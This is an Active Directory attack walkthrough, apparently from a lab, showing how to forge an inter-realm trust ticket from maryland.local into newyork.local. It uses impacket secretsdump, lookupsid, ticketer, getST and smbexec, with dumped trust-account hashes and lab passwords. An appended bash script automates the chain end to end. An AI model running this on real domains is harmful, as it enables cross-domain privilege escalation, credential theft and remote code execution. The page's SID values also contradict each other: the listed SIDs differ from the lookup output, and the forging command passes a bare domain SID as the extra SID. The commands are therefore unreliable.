Trust ticket with external forest (maryland.local -> newyork.local)

  • Exactly as with the intra-forest trust ticket, the same technique works across an external trust: forge an inter-realm TGT (a referral ticket for krbtgt/newyork.local) with the trust key. But, as with the cross-trust golden ticket, it only works if SID history is enabled on the trust (SID filtering relaxed); otherwise the newyork.local DC strips the injected extra SID from the PAC and the ticket buys nothing.

  • Find each domain's SID with lookupsid.py (every domain has its own SID; the source domain's SID goes in -domain-sid, the target domain's SID is the base of -extra-sid):

    • maryland.local SID : S-1-5-21-2203133648-1386395927-1390703624

    • newyork.local SID: S-1-5-21-1409754491-4246775990-3914137275

# Trust key: the NEWYORK$ trust account in maryland.local, dumped from the maryland.local DC (192.168.56.12).
# The NT hash is the RC4 inter-realm key; the AES keys are listed too in case RC4 is disabled on the trust.
secretsdump.py -just-dc-user 'NEWYORK$' maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.12
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:67bff53c935e4ba7e695b7744a4707f27519f330a10ce9ce88b3df1c51062c33
newyork$:aes128-cts-hmac-sha1-96:1057280d1cc1152e3054558b5244f6d3
newyork$:des-cbc-md5:01a864762326161f
[*] Cleaning up... 
# newyork.local SID (point lookupsid at a DC of the domain whose SID you want; the 0 skips RID brute forcing)
lookupsid.py  -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 0

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987


# maryland.local SID (check that the two values differ: identical SIDs mean both queries hit the same DC)
lookupsid.py  -domain-sids maryland.local/Carmelo.Anthony:'ballislife'@192.168.56.10 0

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987
  • Create the inter-realm TGT: -nthash is the NEWYORK$ trust key, -domain and -domain-sid describe the realm the ticket is forged for (maryland.local), -extra-sid is the SID injected via SID history (it must belong to the target domain and name a principal there, typically a privileged group such as <newyork.local SID>-519), -spn krbtgt/newyork.local makes it a referral ticket to newyork.local, and ballislife is the forged user name (ticketer writes ballislife.ccache):

ticketer.py -nthash 3efc88864c2ab5cb43747ae949685db2 \
 -domain-sid S-1-5-21-620482180-1620433373-1814187987 \
 -domain maryland.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987 \
 -spn krbtgt/newyork.local ballislife
  • Ask the newyork.local KDC for a service ticket for CIFS on nyc.newyork.local using the forged referral ticket (add -dc-ip <newyork.local DC> if the realm does not resolve; a KDC_ERR or an empty PAC here usually means SID filtering is still on):

export KRB5CCNAME=/home/jefe/delegation/ballislife.ccache
getST.py -k -no-pass -spn cifs/nyc.newyork.local \
 newyork.local/ballislife@newyork.local -debug
  • And enjoy: use the CIFS ticket from the cache (secretsdump.py -k -no-pass against nyc.newyork.local works too); klist lists what is cached:

export KRB5CCNAME=/workspace/trusts/external/ballislife@newyork.local.ccache
smbexec.py -k -no-pass ballislife@nyc.newyork.local -debug
klist
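The whole chain above as one script, added here as an example; it is not part of the original page nor of impacket. It only wraps the page's commands with the checks a practitioner wants before spending the trust key: it parses the domain SID out of lookupsid.py and the trust key out of secretsdump.py, refuses to continue when the two domain SIDs are identical (two equal SIDs mean lookupsid was pointed at the same DC twice) and always appends a RID to the target SID, because a bare domain SID as -extra-sid names no principal. IPs, hostnames and credentials are the page's; that 192.168.56.10 is the newyork.local DC, RID 519 (Enterprise Admins of the forest root newyork.local) and the use of -dc-ip are assumptions. Only run_chain touches the network; the parsing and SID helpers run offline.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: the maryland.local -> newyork.local chain
# as functions with sanity checks. Assumptions: 192.168.56.12 = maryland.local DC,
# 192.168.56.10 = newyork.local DC, nyc.newyork.local = target host, RID 519 = group
# injected via SID history. Only run_chain touches the network.
set -eu

# Pull "[*] Domain SID is: S-1-5-21-..." out of lookupsid.py -domain-sids output.
domain_sid_from_lookupsid() {
  awk '/^\[\*\] Domain SID is: / { print $NF; exit }'
}

# Pull the trust account's NT hash (default) or AES-256 key out of secretsdump output.
# NT lines look like "user:rid:lmhash:nthash:::", AES lines like "user:aes256-cts-hmac-sha1-96:key".
trust_key_from_secretsdump() {
  local account="$1" kind="${2:-nt}"
  if [ "$kind" = aes256 ]; then
    awk -F: -v a="$account" 'tolower($1)==tolower(a) && $2=="aes256-cts-hmac-sha1-96" { print $3; exit }'
  else
    awk -F: -v a="$account" 'tolower($1)==tolower(a) && $2 ~ /^[0-9]+$/ { print $4; exit }'
  fi
}

# SID history only helps if the injected SID belongs to the *target* domain and names a
# principal there: refuse identical domain SIDs and always append a RID.
build_extra_sid() {
  local src_sid="$1" dst_sid="$2" rid="${3:-519}"
  case "$dst_sid" in S-1-5-21-*) ;; *) echo "bad domain SID: $dst_sid" >&2; return 1 ;; esac
  if [ "$src_sid" = "$dst_sid" ]; then
    echo "source and target domain SIDs are identical; query each domain's own DC" >&2
    return 1
  fi
  printf '%s-%s\n' "$dst_sid" "$rid"
}

need() { [ -n "$2" ] || { echo "missing $1; check the previous command's output" >&2; return 1; }; }

# The full chain against the lab (assumed hosts/creds as above).
run_chain() {
  local src=maryland.local dst=newyork.local src_dc=192.168.56.12 dst_dc=192.168.56.10
  local creds='Carmelo.Anthony:ballislife' user=ballislife target=nyc.newyork.local
  local key src_sid dst_sid extra_sid st_file

  # 1. trust key of NEWYORK$ from the maryland.local DC (the inter-realm key)
  key=$(secretsdump.py -just-dc-user 'NEWYORK$' "${src}/${creds}@${src_dc}" \
        | trust_key_from_secretsdump 'NEWYORK$')
  need "trust key" "$key"
  # 2. one SID per domain, each from its own DC (maryland creds reach the newyork DC through the trust)
  src_sid=$(lookupsid.py -domain-sids "${src}/${creds}@${src_dc}" 0 | domain_sid_from_lookupsid)
  dst_sid=$(lookupsid.py -domain-sids "${src}/${creds}@${dst_dc}" 0 | domain_sid_from_lookupsid)
  need "source SID" "$src_sid"; need "target SID" "$dst_sid"
  extra_sid=$(build_extra_sid "$src_sid" "$dst_sid" 519)
  echo "[+] trust key=$key src=$src_sid dst=$dst_sid extra=$extra_sid"

  # 3. inter-realm TGT: issued "by" maryland.local for krbtgt/newyork.local, sealed with the trust key
  ticketer.py -nthash "$key" -domain-sid "$src_sid" -domain "$src" \
              -extra-sid "$extra_sid" -spn "krbtgt/${dst}" "$user"
  export KRB5CCNAME="$PWD/${user}.ccache"

  # 4. present the referral to the newyork.local KDC for a CIFS ticket; getST names its output file
  st_file=$(getST.py -k -no-pass -spn "cifs/${target}" -dc-ip "$dst_dc" "${dst}/${user}@${dst}" 2>&1 \
            | tee /dev/stderr | sed -n 's/.*Saving ticket in //p')
  [ -n "$st_file" ] || { echo "getST saved no ticket (SID filtering still on the trust?)" >&2; return 1; }

  # 5. use it
  export KRB5CCNAME="$PWD/${st_file}"
  klist
  smbexec.py -k -no-pass -dc-ip "$dst_dc" "${user}@${target}"
}

if [ "${1:-}" = run ]; then run_chain; fi
```

Run it as `bash trust_ticket.sh run` from a directory where the ccache files may be written; the extra SID is built from the SID lookupsid returns for the target domain, so the script never reuses the source domain's SID by accident.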
